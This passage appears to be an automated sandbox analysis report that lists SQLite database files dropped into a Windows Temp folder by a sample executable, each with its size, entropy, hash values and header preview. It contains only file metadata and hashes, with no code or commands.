                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pGg0F8UdWJ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pR9Qn1CZSO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pTPC4ZElGW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pYQybnhkGF

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\poEVv2QU57

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\q0ozVioHr6

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qFtnCEB7Gc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qR5Ry0gzsR

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qS8xxBy0ds

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qV8EHDF9sR

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qVPItChsAm

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qYkALoiAHn

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qaDh6VgPFP

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qhd4qNe8Ek

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qou7hTQpqZ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\quXZ8zcLrG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rIa4LO6cpc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rKbhGLeUni

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\raQQj9P8Oc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rgoCKU8lRv

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rsxZCWSIh5

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\sAOXX83bkc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\sKlvsqb8q4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
